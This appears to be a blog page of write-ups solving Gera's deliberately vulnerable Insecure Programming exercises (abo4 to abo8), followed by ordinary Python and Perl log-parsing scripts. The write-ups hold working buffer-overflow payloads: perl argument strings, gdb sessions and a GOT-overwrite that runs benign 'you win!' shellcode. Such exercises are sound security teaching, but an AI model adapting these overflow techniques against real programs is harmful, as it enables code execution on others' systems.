Insecure Programming by Example: abo6/7/8 Ménage à trois

This post will be pretty brief, as there are no significant differences in the solution for abo6.c from other previously covered exercises, while abo7.c and abo8.c are both not exploitable. The latter two exercises demonstrate important concepts regarding the placement of variously defined variables within memory for compiled C code which I’ll outline, but it won’t take long.

abo6.c

/* abo6.c                                       *
/* specially crafted to feed your brain by gera */

/* wwwhat'u talkin' about? */

int main(int argv,char **argc) {
    char *pbuf=malloc(strlen(argc[2])+1);
    char buf[256];

    strcpy(buf,argc[1]);
    strcpy(pbuf,argc[2]);
    while(1);
}

This code is pretty much the same as the last exercise, but with an important difference, instead of a call to exit() there is a while loop that never ends at the end of the code. In the disassembly, this looks like the following:

0x08048428 :   call   0x80482f8
0x0804842d :   mov    eax,DWORD PTR [ebp+12]
0x08048430 :   add    eax,0x8
0x08048433 :   mov    eax,DWORD PTR [eax]
0x08048435 :   mov    DWORD PTR [esp+4],eax
0x08048439 :   mov    eax,DWORD PTR [ebp-12]
0x0804843c :   mov    DWORD PTR [esp],eax
0x0804843f :   call   0x80482f8
0x08048444 :   jmp    0x8048444 

So basically, it’s a unconditional jump that targets itself, therefore it never ends. Since there is no call to a library function like exit, we can’t overwrite an entry in the GOT or some such similar tactic to gain control of execution. However, where there is a will there is a way, and we must keep in mind that we can still write arbitrarily to memory so long as permissions allow. The solution in this case is nothing revolutionary, we’ll merely directly overwrite the saved return address of the second strcpy stack frame. This is an important reminder by Gera that being able to write a value into memory is a tool with many applications, some of which I’m sure I’m not even aware of at this point.

The one tricky part of this solution is to not attempt the to overwrite the saved return address of the second strcpy stack frame until you’ve passed exactly the same size arguments you will pass for the overwrite, because the location of the saved EIP for the stack frame will be different depending on the size of the values stored in argc. In the debugger, here is what the solution looks like.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./abo6
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x080483e4 :    push   ebp
0x080483e5 :    mov    ebp,esp
0x080483e7 :    sub    esp,0x128
0x080483ed :    and    esp,0xfffffff0
0x080483f0 :   mov    eax,0x0
0x080483f5 :   sub    esp,eax
0x080483f7 :   mov    eax,DWORD PTR [ebp+12]
0x080483fa :   add    eax,0x8
0x080483fd :   mov    eax,DWORD PTR [eax]
0x080483ff :   mov    DWORD PTR [esp],eax
0x08048402 :   call   0x80482e8
0x08048407 :   inc    eax
0x08048408 :   mov    DWORD PTR [esp],eax
0x0804840b :   call   0x8048308
0x08048410 :   mov    DWORD PTR [ebp-12],eax
0x08048413 :   mov    eax,DWORD PTR [ebp+12]
0x08048416 :   add    eax,0x4
0x08048419 :   mov    eax,DWORD PTR [eax]
0x0804841b :   mov    DWORD PTR [esp+4],eax
0x0804841f :   lea    eax,[ebp-0x118]
0x08048425 :   mov    DWORD PTR [esp],eax
0x08048428 :   call   0x80482f8
0x0804842d :   mov    eax,DWORD PTR [ebp+12]
0x08048430 :   add    eax,0x8
0x08048433 :   mov    eax,DWORD PTR [eax]
0x08048435 :   mov    DWORD PTR [esp+4],eax
0x08048439 :   mov    eax,DWORD PTR [ebp-12]
0x0804843c :   mov    DWORD PTR [esp],eax
0x0804843f :   call   0x80482f8
---Type  to continue, or q  to quit---
0x08048444 :   jmp    0x8048444
End of assembler dump.
(gdb) break *0x0804843f
Breakpoint 1 at 0x804843f: file abo6.c, line 11.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo6 one two

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff874) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) x buf
0xbffff6d0:     0x00656e6f
(gdb) x &pbuf
0xbffff7dc:     0x0804a008
(gdb) print/d 0xbffff7dc - 0xbffff6d0
$1 = 268
(gdb) run $(perl -e 'print "A" x 268 . "BBBB";') CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "BBBB";') CCCC

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) stepi
0x080482f8 in strcpy@plt ()
(gdb) where
#0  0x080482f8 in strcpy@plt ()
#1  0x08048444 in main (argv=3, argc=0xbffff764) at abo6.c:11
(gdb) info frame 0
Stack frame at 0xbffff5b0:
 eip = 0x80482f8 in strcpy@plt; saved eip 0x8048444
 called by frame at 0xbffff6e0
 Arglist at 0xbffff5a8, args:
 Locals at 0xbffff5a8, Previous frame's sp is 0xbffff5b0
 Saved registers:
  eip at 0xbffff5ac
(gdb) run $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) next

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

abo7.c and abo8.c

These two exercises as mentioned previously are unexploitable. They highlight where variables are placed in memory when declared in a certain manner using C.

abo7.c

/* abo7.c                                       *
 * specially crafted to feed your brain by gera */

/* sometimes you can,       *
 * sometimes you don't      *
 * that's what life's about */

char buf[256]={1};

int main(int argv,char **argc) {
    strcpy(buf,argc[1]);
}

Here you have an initialized global variable in the form of buf. You can see pretty easily using the versatile objdump command that while this is a legitimate buffer overflow (using an unbounded function like strcpy), the location of this variable precludes any useful behavior for taking control of the program.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7 | grep buf
080495a0 g     O .data  00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7

abo7:     file format elf32-i386
abo7
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         00000120  08049580  08049580  00000580  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000004  080496a0  080496a0  000006a0  2**2
                  ALLOC

080495a0 g     O .data  00000100              buf
080496a0 g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

abo8.c

Gera says: Don’t stay static

/* abo8.c                                       *
 * specially crafted to feed your brain by gera */

/* spot the difference */

char buf[256];

int main(int argv,char **argc) {
	strcpy(buf,argc[1]);
}

Gera continues: From the top of your head, what do you think is generally more safe, a program dynamically linked to its libraries or one statically linked to them? Now go and try it out!

In this next example, very similar restrictions apply, with Gera challenging you to spot the difference between the two. Since buf in this case is uninitialized, it is stored in the .bss section of the ELF executable.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8 | grep buf
080495a0 g     O .bss   00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8

abo8:     file format elf32-i386
abo8
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip...>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         0000000c  08049570  08049570  00000570  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000120  08049580  08049580  0000057c  2**5
                  ALLOC
 23 .comment      0000012f  00000000  00000000  0000057c  2**0
                  CONTENTS, READONLY
<...snip...>
080495a0 g     O .bss   00000100              buf
0804957c g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

I’m a little disconcerted by the fact that I’m not sure what Gera was driving at with his hints in this one, I’ve been over and over it, and I’m pretty sure the compilation options don’t matter. If you were to compile this as a statically-linked executable, you’d still have almost nothing to work with to control execution, because buf still exists in a memory region that’s pretty much useless to have a buffer overflow in. I’m sure there is some point, but I don’t see it. It may be that with an older compiler on an older distribution this example had some useful lessons to teach, certainly the point about .data versus .bss is well taken. In a previous exercise, I alluded to a paper by Juan M. Bello Rivas (see Books & Pubs for more) on overwriting .dtors 0xFFFFFFFF values to redirect execution which I think would also have some possibilities for these examples, but I don’t have an old enough system to test on.

For the last word on this particular issue (and the general usefulness of control of variables in these sections) I’d like to provide an excerpt from the book The Art of Software Security Assessment by Mark Dowd, John McDonald, and Justin Schuh.  This book is a nice resource to have, I’d recommend that if you don’t already own it you go purchase a copy and keep it on the shelf, using it as a pre-Google resource or jumping off point.

Global and Static Data Overflows

Global and static variables are used to store data that persists between different function calls, so they are generally stored in a different memory segment than stack and heap variables are. Normally, these locations don’t contain general program runtime data structures, such as stack activation records and heap chunk data, so exploiting an overflow in this segment requires application-specific attacks similar to the vulnerability in Listing 5-2. Exploitability depends on what variables can be corrupted when the buffer overflow occurs and how the variables are used. For example, if pointer variables can be corrupted, the likelihood of exploitation increases, as this corruption introduces the possibility for arbitrary memory overwrites.

Listing 5-2

Off-by-One Length Miscalculation

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[1024];

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer, "password is incorrect for user %s\n", username);
        log("%s", buffer);
    }

    return authenticated;
}

Next up, we screw with malloc and make it to what we want, trying to learn something about it’s implementation to boot.

Advertisements

Insecure Programming by Example: abo5.c we GOT this…

Introduction

I actually solved this one a bit ago, while messing around at the GFIRST 2010 conference in San Antonio. Just now getting around to writing it up.

Here is the code for abo5.c:

Gera says: ch-ch-ch-changes

/* abo5.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* You take the blue pill, you wake up in your bed,    *
 *     and you believe what you want to believe        *
 * You take the red pill,                              *
 *     and I'll show you how deep goes the rabbit hole */

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	strcpy(buf,argc[1]);
	for (;*pbuf++=*(argc[2]++););
	exit(1);
}

Use your sixth sense, will you be able to gain control given the possibility of writing wherever you wish in memory?

As you can see, this is very similar code to the abo4.c exercise. Gera’s words are the keys to this exercise…as is often the case he’s given us a clue. We know very well from our previous trials and tribulations with abo4.c that by overflowing the pointer address of pbuf on the stack, we can essentially control 4-bytes of data at an arbitrary writeable location in the memory of the running process. This ends up being the key to successful exploitation of this code snippet.

Disassembly

Let’s take a look at the disassembled code, with the important bits highlighted.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x0804842a <main+22>:   add    eax,0x8
0x0804842d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804842f <main+27>:   mov    DWORD PTR [esp],eax
0x08048432 <main+30>:   call   0x804830c <strlen@plt>
0x08048437 <main+35>:   inc    eax
0x08048438 <main+36>:   mov    DWORD PTR [esp],eax
0x0804843b <main+39>:   call   0x804832c <malloc@plt>
0x08048440 <main+44>:   mov    DWORD PTR [ebp-12],eax
0x08048443 <main+47>:   mov    eax,DWORD PTR [ebp+12]
0x08048446 <main+50>:   add    eax,0x4
0x08048449 <main+53>:   mov    eax,DWORD PTR [eax]
0x0804844b <main+55>:   mov    DWORD PTR [esp+4],eax
0x0804844f <main+59>:   lea    eax,[ebp-0x118]
0x08048455 <main+65>:   mov    DWORD PTR [esp],eax
0x08048458 <main+68>:   call   0x804831c <strcpy@plt>
0x0804845d <main+73>:   mov    eax,DWORD PTR [ebp-12]
0x08048460 <main+76>:   mov    ecx,eax
0x08048462 <main+78>:   mov    eax,DWORD PTR [ebp+12]
0x08048465 <main+81>:   add    eax,0x8
0x08048468 <main+84>:   mov    edx,DWORD PTR [eax]
0x0804846a <main+86>:   movzx  edx,BYTE PTR [edx]
0x0804846d <main+89>:   inc    DWORD PTR [eax]
0x0804846f <main+91>:   mov    BYTE PTR [ecx],dl
0x08048471 <main+93>:   lea    eax,[ebp-12]
0x08048474 <main+96>:   inc    DWORD PTR [eax]
0x08048476 <main+98>:   test   dl,dl
0x08048478 <main+100>:  jne    0x804845d <main+73>
0x0804847a <main+102>:  mov    DWORD PTR [esp],0x1
0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.

The first highlighted line contains the call to strcpy that will overwrite the pointer value with the value presented as argv[2] or the second command line argument. The bit in between the first and second highlighted line is the implementation of the for loop that overwrites *pbuf with the value in argv[2], and the second highlighted line is the call to exit. As you can see in the disassembly and when reviewing the source, this code is slightly different from the previous pointer-overwrite exercise, in that there is no call to the pointer afterward. So we can’t control execution in that manner. We could do a saved return address overwrite, since we essentially have control over a single DWORD in writeable memory (the stack being a writeable memory location of course) but unfortunately there is a pesky call to exit that will prevent us from using that method.

Actually if you’ve taken a look, you’ve realized that pretty much the only thing that happens after we overwrite the pointer value is a call to exit. Hmm…how can we use this to our advantage? Well first, you’ll note that the call to the exit routine is actually not as clear cut as it seems. It’s actually a call to a pointer in memory…perhaps we can control this call location?

Dynamic Linking

The reason that this call is exploitable is because the program is dynamically linked. The gist of the meaning of dynamic linking is essentially the ability of a program to be compiled with references to external functions (functions that exist in some header file which has been compiled somewhere, for instance stdio.h and the printf) which are resolved at run time or load time (linking and loading being beyond the scope of this article and indeed my knowledge), sometimes you may hear it referred to as run time linking for that reason. This is what .dll files on Windows are for, and .so files on Linux and UNIX. Essentially, they contain functions that might be useful to have on the system, or functions that are specified to be available by the C or C++ standards, and allows them to be shared among multiple external programs without the need to directly compile them inline into the code. This provides a few advantages, off the top of my head the most obvious ones being you can change the code in a commonly used function only once to fix a bug and it propagates to a bunch of other code automatically, and that you reduce the compiled size and complexity of a given code base. In all of these operating systems that use dynamic linking there is some sort of a look up table that allows programs to resolved run time linked functions, in Linux and UNIX this look up table is called the GOT, or Global Offset Table and it works in close conjunction with another structure called the Procedure Linkage Table or PLT.

Taking a Look Under the Hood

There is a lot of documentation to be found describing the structure and implementation of the GOT and PLT on Linux machines, and I’ve included some that I’ve found useful at the end of this post. In this case, I think I’d rather just take a look at the assembly and let that point us in the right direction. Honestly, so long as you understand that you can write an arbitrary 4-byte value anywhere you want to (that is writeable and won’t produce a segfault) you can reason out what to do here without knowing much or at all about the GOT or PLT.

Let’s step through the call to exit and see what we find.

0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.
(gdb) x/i 0x804833c
0x804833c <exit@plt>:   jmp    DWORD PTR ds:0x8049668
(gdb) x/xw 0x8049668
0x8049668 <_GLOBAL_OFFSET_TABLE_+32>:   0x08048342

First we’ve got displayed the call to 0x804833c, which is the location of exit in the aforementioned PLT. So we’ll examine the instruction at that address, which is essentially an unconditional jump to the address contained in a pointer. This pointer, as you can see from the results of the final command we ran, is in the GOT, and contains the value 0x08048342. If we were to overwrite that value with some shellcode on the stack, we’ll have control of execution. Here is what that would look like.

First we’ll determine the distance between the address of buf and pbuf on the stack.

(gdb) break 1
Breakpoint 2 at 0x8048414: file abo5.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo5 one two

Breakpoint 2, main (argv=134513684, argc=0x3) at abo5.c:9
9       int main(int argv,char **argc) {
(gdb) x/x &buf
0xbffff730:     0x0804819c
(gdb) x/x &pbuf
0xbffff83c:     0xb8000ff4
(gdb) print/d 0xbffff83c - 0xbffff730
$4 = 268

Then we’ll do our at-this-point-very-common magic with the shellcode we’ve been using all along, the address on the GOT for exit, the getenvaddr.c code that was generously provided by Hacking: The Art of Exploitation, and all the rest.

hacking@hacking-theart:~/InsecureProgramming $ hexdump -C print_youwin_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0a cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21 0a 0d                                       |n!..|
00000024
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat print_youwin_shellcode)
hacking@hacking-theart:~/InsecureProgramming $ echo $SHELLCODE
?Y1??1?C1? ??K??????you win!
hacking@hacking-theart:~/InsecureProgramming $ ./getenvaddr SHELLCODE ./abo5
SHELLCODE will be at 0xbffff9ec
hacking@hacking-theart:~/InsecureProgramming $ ./abo5 $(perl -e 'print "A" x 268 . "\x68\x96\x04\x08";') $(perl -e 'print "\xec\xf9\xff\xbf";')
you win!

There we go, that’s all for now :-).

References

I didn’t really use these references to develop this post, but in perusing them I thought they’d be useful for someone wanting a bit more in-depth explanation of some of the concepts in here.

Executable and Linking Format (ELF) by unknown author, Tool Interface Standards, Portable Formats Specification, Ver 1.1
Dynamic Linking in Linux and Windows by Reji Thomas and Bhasker Reddy, Symantec
Understanding Memory by University of Alberta AICT Research and Support

Insecure Programming by Example: abo4.c POINTER MADNESS

Introduction

I love sensational titles.

Here is abo4.c:

/* abo4.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* After this one, the next is just an Eureka! away          */

extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	fn=(void(*)(char*))&puts;
	strcpy(buf,argc[1]);
	strcpy(pbuf,argc[2]);
	fn(argc[3]);
	while(1);
}

Gera says:

oh pointers, pointers!
Do you remember when you had problems with * and &? everybody has that kind of problems at least once when learning C, what about poiners to pointers? let’s see…

There are a few elements of this that we should go over before we review the disassembly itself, though of course that will prove to be the most fruitful way to attack most problems like this it seems to me there’s lots of C here that we haven’t seen before.

First, let’s address the use of the extern keyword. From what I can tell, this was declared so that we could utilize the unary address-of operator on functions imported from the header file stdio.h and whatever the heck contains system. I’d love to be corrected, I’m no C ninja, but other than that I can’t see the point of it. Some documentation on extern is available here, if you want to peruse it on your own…this is what led me to this conclusion.

Now for the life of me, I can’t figure out what the heck he’s doing on the next line with the void pointer to system, I should email him and ask but I hear he’s a busy guy ;-). Maybe that one will come out in the comments as well. The pointer bits are important though, as we’ll see in a bit.

The last thing we should mention here is the usage within main of malloc to allocate a buffer, as I think this is the first time it’s come up. Documentation on the usage of malloc can be found here, essentially what this code is doing is naming a pointer of type char (1 byte size, for the purposes of pointer arithmetic), and pointing this pointer to the value returned by malloc. The value returned by malloc based on reading it’s arguments is the length of the second argument submitted to main plus one byte…this is done to allow for strcpy to include the NULL byte at the end of the string submitted as the argument, otherwise you might get more than you intended in this chunk of memory.

In the Debugger

Now let’s take a look at the disassembly of the program itself once it’s compiled in GCC, using our favorite debugger GDB.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048444 : push ebp
0x08048445 : mov ebp,esp
0x08048447 <main+3>: sub esp,0x128
0x0804844d : and esp,0xfffffff0
0x08048450 : mov eax,0x0
0x08048455 : sub esp,eax
0x08048457 : mov eax,DWORD PTR [ebp+12]
0x0804845a : add eax,0x8
0x0804845d : mov eax,DWORD PTR [eax]
0x0804845f : mov DWORD PTR [esp],eax
0x08048462 <main+30>: call 0x8048340 <strlen@plt>
0x08048467 : inc eax
0x08048468 : mov DWORD PTR [esp],eax
0x0804846b : call 0x8048360
0x08048470 : mov DWORD PTR [ebp-12],eax
0x08048473 : mov DWORD PTR ds:0x80496bc,0x8048370
0x0804847d : mov eax,DWORD PTR [ebp+12]
0x08048480 : add eax,0x4
0x08048483 : mov eax,DWORD PTR [eax]
0x08048485 : mov DWORD PTR [esp+4],eax
0x08048489 : lea eax,[ebp-0x118]
0x0804848f : mov DWORD PTR [esp],eax
0x08048492 <main+78>: call 0x8048350 <strcpy@plt>
0x08048497 : mov eax,DWORD PTR [ebp+12]
0x0804849a : add eax,0x8
0x0804849d : mov eax,DWORD PTR [eax]
0x0804849f : mov DWORD PTR [esp+4],eax
0x080484a3 : mov eax,DWORD PTR [ebp-12]
0x080484a6 : mov DWORD PTR [esp],eax
0x080484a9 : call 0x8048350
0x080484ae : mov eax,DWORD PTR [ebp+12]
0x080484b1 : add eax,0xc
0x080484b4 : mov eax,DWORD PTR [eax]
0x080484b6 : mov DWORD PTR [esp],eax
0x080484b9 : mov eax,ds:0x80496bc
0x080484be : call eax
0x080484c0 : jmp 0x80484c0
End of assembler dump.

I’ve taken the liberty of highlighting the function calls. It seems to me that any time you see a call eax your ears should prick up. This is the spot where we have to exploit the program, as right after that you have an unconditional jump to itself, the infinite loop at the end of the program which prevents us from overwriting the saved return address and exploiting upon exit from main.

What we have with this program is essentially two insecure functions, and then a call to a program-defined function which is a pointer stored at 0x80496bc…if we can somehow modify what address is here, we can control execution of the program and win.

Draw the Stack

Let’s take a look at the variables on the stack, which we can likely control with our wonderful unbounded strcpy call.

(gdb) x
0xbffff730: 0x080481b0
(gdb) x
0xbffff83c: 0xb8000ff4
(gdb) x
0x80496bc : 0x08048320
(gdb) print 0xbffff83c - 0xbffff730
$1 = 268

Your spider sense should be tingling here. Let’s ask ourselves what the program is doing…first it copies via an insecure function an unbounded amount of data to the stack. The same stack that contains the pointer to which another insecure function will be used to copy to. This fatal combination of (intentional and educational!) errors allows us to write any amount of data we want to an arbitrary write-able location in the program’s memory. We can use this to our advantage and overwrite the address stored in the fn function pointer, and essentially execute wherever we wish.

Keeping in mind that the variables are 268 bytes away from each other, here is a proof-of-concept detailing the control of the EIP register. What we are doing is submitting the first argument (the string copied by the first copy function) as a 272-byte string, 268 bytes of junk to get us to the overwrite of the location of pbuf and then the address of the fn pointer. Then we’ll submit the second argument which is what will overwrite fn as 0x41414141 or “AAAA”. The third argument we’ll submit but leave alone as it will never get used. Upon execution, it attempts to call the value stored at fn, and segfaults. Examining EIP proves our control of execution. If you want to take this one all the way, you could follow the tried-and-true technique of storing shellcode to execute in an environment variable and determining it’s address with a special program, a technique I detailed in the abo1.c post I did some time ago. Happy hunting!

(gdb) run $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo4 $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $eip
0x41414141: Cannot access memory at address 0x41414141
(gdb) x
0x80496bc <fn>: 0x41414141

Passive DNS mining from PCAP with dpkt & Python

Update 04/14: A friend pointed me to dnssnarf, a project that looks like it was written at a DojoSec meeting by Christopher McBee and then updated a bit later on by Grant Stavely. It uses Scapy (which I hear is really neat if you haven’t played with it). Check Grant’s blog post about dnssnarf out.

So, here is another quickie in case anyone needs it out there in the Intertubes. Say you have a .pcap file, or many .pcap files, and you want to mine the DNS responses out of them so you can build up a passive DNS database and track malicious resolutions to build a list of ban-able IP addresses. This script aims to parse a given .pcap file (tcpdump/wireshark libpcap format) and returns the results of the query types you have interest in.

This script is built around dpkt, a tool by Dug Song, and the contents are heavily inspired by the tutorials present at Jon Oberheide’s site (also a developer of dpkt). Honestly, most of the time writing this was spent understanding how dpkt handled its internal data structures and how to get to the data. The documentation on dpkt is not the most mature, but the source is pretty readable, if you keep the references I mention in the comments at hand. Also, this script was only tested with Python 2.6 and dpkt 1.7 on Linux, it was confirmed to not work on Windows as dpkt appears to have some serious problems with Windows at the moment.

#!/usr/bin/env python

import dpkt, socket, sys

if len(sys.argv) < 2 or len(sys.argv) > 2:
 print "Usage:\n", sys.argv[0], "filename.pcap"
 sys.exit()

f = open(sys.argv[1])
pcap = dpkt.pcap.Reader(f)

for ts, buf in pcap:
 # make sure we are dealing with IP traffic
 # ref: http://www.iana.org/assignments/ethernet-numbers
 try: eth = dpkt.ethernet.Ethernet(buf)
 except: continue
 if eth.type != 2048: continue
 # make sure we are dealing with UDP
 # ref: http://www.iana.org/assignments/protocol-numbers/
 try: ip = eth.data
 except: continue
 if ip.p != 17: continue
 # filter on UDP assigned ports for DNS
 # ref: http://www.iana.org/assignments/port-numbers
 try: udp = ip.data
 except: continue
 if udp.sport != 53 and udp.dport != 53: continue
 # make the dns object out of the udp data and check for it being a RR (answer)
 # and for opcode QUERY (I know, counter-intuitive)
 try: dns = dpkt.dns.DNS(udp.data)
 except: continue
 if dns.qr != dpkt.dns.DNS_R: continue
 if dns.opcode != dpkt.dns.DNS_QUERY: continue
 if dns.rcode != dpkt.dns.DNS_RCODE_NOERR: continue
 if len(dns.an) < 1: continue
 # now we're going to process and spit out responses based on record type
 # ref: http://en.wikipedia.org/wiki/List_of_DNS_record_types
 for answer in dns.an:
   if answer.type == 5:
     print "CNAME request", answer.name, "\tresponse", answer.cname
   elif answer.type == 1:
     print "A request", answer.name, "\tresponse", socket.inet_ntoa(answer.rdata)
   elif answer.type == 12:
     print "PTR request", answer.name, "\tresponse", answer.ptrname

Symantec Brightmail syslog message parser

Ok, this will not be interesting to most of you folks that are subscribed (all three of you [hi Mom!]) but I’m hoping Google will get it and then if anyone needs this script, it’ll be there to help them.

This is just a simple log parser for the really, really annoying multi-line/multi-message format that Symantec Brightmail insists on using when it sends syslog information.

The key points: set your $delimiter and $nullvalue appropriately, and notice that, on fields where Brightmail may have multiple messages (like the IRCPTACTION field, where it basically says if something was delivered, to an individual recipient on the message) the field is sub-divided with commas. This is ok, I verified over a large sampling that those fields do not ever have a comma normally, so you should be able to deal with that just fine if you want to script against the results.

Questions? Comment away. I check ’em.

use strict;
use Carp;

my ($in, $out) = @ARGV;
my $DEBUG=0;
my $line;

croak "\nPlease specify input & output files.  Usage\n\n\t$0 infile outfile\n\n" if (!$in or !$out);
croak "\nABORTED: Input and output files are the same: $in\n\n" if ($in eq $out);

open INFILE, $in or die $!;
open OUTFILE, ">$out" or die $!;

my %result_hash = ();
my $delimiter = "~!^!~"; # I use something weird because the subject line could have anything
my $nullvalue = "NULL";

foreach $line (<INFILE>) {
  chomp($line);
  chomp($line);
  # print "\$line = $line\n";

  # Discard lines that are not from bmserver or ecelerity (the two Brightmail components)
  unless ($line =~ /bmserver:/ || $line =~ /ecelerity:/) { next; }

  # split on pipes "|" to process further
  my ($timestuff, $UID, $msgtype, $therest) = split(/\|/, $line, 4);

  # do some basic validation of UID and msgtype fields, throwaway outliers
  if ($UID =~ /\Q[^0-9a-z\-]\E/ || $msgtype =~ /\Q[^A-Z]\E/) { next; }

  # now we parse all of this crap into a big hash
  if (exists($result_hash{$UID})) {
     if (exists($result_hash{$UID}{$msgtype})) {
        $result_hash{$UID}{$msgtype} = $result_hash{$UID}{$msgtype}.",".$therest;
     } else {
        $result_hash{$UID}{$msgtype} = $therest;
     }
  } else {
     my @timefields = split(/ +/, $timestuff);
	 $result_hash{$UID}{"TIMESTAMPINT"} = $timefields[-1];
     $result_hash{$UID}{$msgtype} = $therest;
  }
}

my @recs_to_sort = ();
my @hash_elements = qw(ACCEPT ATTACH ATTACHFILTER DELIVER DELIVERY_FAILURE IRCPTACTION MSGID ORCPTS SENDER SOURCE SUBJECT TRACKERID UNSCANNABLE UNTESTED VERDICT VIRUS);
for my $key (keys %result_hash) {
  my @tmp_line = ();
  push(@tmp_line, $result_hash{$key}{"TIMESTAMPINT"});
  push(@tmp_line, $key);
  foreach my $element (@hash_elements) {
     if (exists($result_hash{$key}{$element})) {
        push(@tmp_line, $result_hash{$key}{$element});
     } else {
        push(@tmp_line, $nullvalue);
     }
  }
  push(@recs_to_sort, join($delimiter,@tmp_line));
}

# sort by time for our database inserts
